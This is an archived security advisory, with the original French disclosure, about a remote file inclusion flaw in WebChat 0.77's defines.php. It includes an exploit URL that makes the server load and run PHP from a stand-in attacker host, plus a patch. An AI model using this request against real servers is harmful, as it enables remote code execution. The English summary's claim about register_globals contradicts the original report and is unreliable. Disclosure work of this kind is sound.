SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   WebChat (webdev.ro) Vendors:   Toma, Daniel
WebChat Include File Bug in 'defines.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1006193
SecurityTracker URL:  http://securitytracker.com/id/1006193
CVE Reference:   CVE-2007-0485   (Links to External Site)
Updated:  Jul 7 2008
Original Entry Date:  Mar 3 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.77
Description:   An include file vulnerability was reported in WebChat. A remote user can execute arbitrary PHP code and operating system commands on the target server.

Frog-m@n reported that the 'defines.php' script includes the 'db_mysql.php' and 'language/english.php' files relative to the $WEBCHATPATH variable but does not validate that the included files are from the proper location. A remote user can specify a remote location for those include files, causing the target server to include and execute the remotely located files.

As an example, the following URL will cause the http://[attacker]/db_mysql.php file to be executed on the target server:

http://[target]/defines.php?WEBCHATPATH=http://[attacker]/

According to the report, this exploit is not possible is the register_globals parameter is set to ON.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target server. The code or commands will run with the privileges of the web server.
Solution:   No vendor solution was available at the time of this entry. The author of the report has issued an unofficial patch, available at:

http://www.phpsecure.info/

Vendor URL:  www.webdev.ro/products/webchat/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  WebChat


						WebChat
						*******
Informations :
Langage : PHP
Website : http://www.webdev.ro
Version : 0.77

Developpement :

Le faille est relativement classique.
Dans le fichier defines.php, on peut voir les lignes de code :
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------
On pourra donc inclure et faire executer les fichier http://[attacker]/db_mysql.php et 
du type :
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
serveur http://[target]
et avec ses droits et restrictions.
Tout ceci n'est possible que si register_globals est sur ON.

Patch :
Dans defines.php, remplacer les lignes :
-----------------------------
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
-----------------------------
par :
--------------------
$WEBCHATPATH = './';
--------------------

Credits :
Auteur : frog-m@n
E-mail : frog-man@frog-man.org
Website : http://www.phpsecure.info
Date : 01/03/03


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC